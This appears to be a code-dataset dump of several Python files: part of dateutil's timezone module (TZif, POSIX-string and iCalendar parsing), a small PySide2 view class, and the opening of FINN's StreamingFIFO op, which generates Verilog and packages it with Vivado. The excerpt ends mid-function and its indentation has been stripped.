# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
# dst offset, so I belive that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
# Here we break the compatibility with the TZ variable handling.
# GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
# We must initialize it first, since _delta() needs
# _std_offset and _dst_offset set. Use False in start/end
# to avoid building it two times.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
# Default is to start on first sunday of april, and end
# on last sunday of october.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
lastcomp = comp[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
name = name[:-1]
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
# vim:ts=4:sw=4:et
| [((42, 7, 42, 28), 'datetime.timedelta', 'datetime.timedelta', ({(42, 26, 42, 27): '0'}, {}), '(0)', False, 'import datetime\n'), ((101, 18, 101, 60), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((43, 15, 43, 52), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', ({(43, 50, 43, 51): '0'}, {}), '(0)', False, 'import datetime\n'), ((73, 23, 73, 57), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((103, 22, 103, 63), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((546, 15, 546, 47), 'datetime.datetime', 'datetime.datetime', ({(546, 33, 546, 40): 'dt.year', (546, 42, 546, 43): '1', (546, 45, 546, 46): '1'}, {}), '(dt.year, 1, 1)', False, 'import datetime\n'), ((581, 14, 581, 32), 'dateutil.parser._parsetz', 'parser._parsetz', ({(581, 30, 581, 31): 's'}, {}), '(s)', False, 'from dateutil import parser\n'), ((643, 15, 643, 52), 'dateutil.relativedelta.relativedelta', 'relativedelta.relativedelta', ({}, {}), '(**kwargs)', False, 'from dateutil import relativedelta\n'), ((651, 28, 651, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((652, 26, 652, 64), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((917, 11, 917, 30), 'os.path.isabs', 'os.path.isabs', ({(917, 25, 917, 29): 'name'}, {}), '(name)', False, 'import os\n'), ((152, 15, 152, 54), 'time.localtime', 'time.localtime', ({(152, 30, 152, 53): '(timestamp + time.timezone)'}, {}), '(timestamp + time.timezone)', False, 'import time\n'), ((356, 24, 356, 58), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((489, 15, 489, 45), 'os.path.isfile', 'os.path.isfile', ({(489, 30, 489, 44): 'self._filename'}, {}), '(self._filename)', False, 'import os\n'), ((504, 31, 504, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((508, 31, 508, 68), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((906, 15, 906, 39), 'os.path.isfile', 'os.path.isfile', ({(906, 30, 906, 38): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((918, 15, 918, 35), 'os.path.isfile', 'os.path.isfile', ({(918, 30, 918, 34): 'name'}, {}), '(name)', False, 'import os\n'), ((610, 36, 610, 76), 'dateutil.relativedelta.weekday', 'relativedelta.weekday', ({(610, 58, 610, 67): 'x.weekday', (610, 69, 610, 75): 'x.week'}, {}), '(x.weekday, x.week)', False, 'from dateutil import relativedelta\n'), ((627, 36, 627, 56), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(627, 53, 627, 55): '+1'}, {}), '(+1)', False, 'from dateutil import relativedelta\n'), ((631, 36, 631, 56), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(631, 53, 631, 55): '-1'}, {}), '(-1)', False, 'from dateutil import relativedelta\n'), ((898, 19, 898, 42), 'os.path.isabs', 'os.path.isabs', ({(898, 33, 898, 41): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((924, 27, 924, 51), 'os.path.join', 'os.path.join', ({(924, 40, 924, 44): 'path', (924, 46, 924, 50): 'name'}, {}), '(path, name)', False, 'import os\n'), ((510, 48, 510, 76), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((515, 54, 515, 74), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(515, 71, 515, 73): '+1'}, {}), '(+1)', False, 'from dateutil import relativedelta\n'), ((520, 56, 520, 76), 'dateutil.relativedelta.SU', 'relativedelta.SU', ({(520, 73, 520, 75): '-1'}, {}), '(-1)', False, 'from dateutil import relativedelta\n'), ((901, 31, 901, 59), 'os.path.join', 'os.path.join', ({(901, 44, 901, 48): 'path', (901, 50, 901, 58): 'filename'}, {}), '(path, filename)', False, 'import os\n'), ((902, 23, 902, 47), 'os.path.isfile', 'os.path.isfile', ({(902, 38, 902, 46): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((925, 23, 925, 47), 'os.path.isfile', 'os.path.isfile', ({(925, 38, 925, 46): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((943, 25, 943, 36), 'dateutil.zoneinfo.gettz', 'gettz', ({(943, 31, 943, 35): 'name'}, {}), '(name)', False, 'from dateutil.zoneinfo import gettz\n'), ((927, 27, 927, 51), 'os.path.isfile', 'os.path.isfile', ({(927, 42, 927, 50): 'filepath'}, {}), '(filepath)', False, 'import os\n'), ((938, 29, 938, 40), 'dateutil.tzwin.tzwin', 'tzwin', ({(938, 35, 938, 39): 'name'}, {}), '(name)', False, 'from dateutil.tzwin import tzwin, tzwinlocal\n')] |
suuperhu/Pyside2MVCFramework | example/first_example/window/inputWindow/view.py | c28bd0fbb6b53bb2cdad8d0723b4251fc93319d6 | # -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : [email protected]
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| [((17, 17, 17, 84), 'os.path.join', 'os.path.join', ({(17, 30, 17, 39): 'BASE_PATH', (17, 41, 17, 83): '"""src\\\\window\\\\inputWindow\\\\inputWindow.ui"""'}, {}), "(BASE_PATH, 'src\\\\window\\\\inputWindow\\\\inputWindow.ui')", False, 'import os\n'), ((25, 10, 25, 32), 'PySide2.QtWidgets.QApplication', 'QApplication', ({(25, 23, 25, 31): 'sys.argv'}, {}), '(sys.argv)', False, 'from PySide2.QtWidgets import QApplication\n')] |
AlexMontgomerie/finn | src/finn/custom_op/fpgadataflow/streamingfifo.py | ec5f67b333ad4db4acf6191c3b5ab5e9067347aa | # Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
assert ishape == tuple(exp_ishape), "Unexpect input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
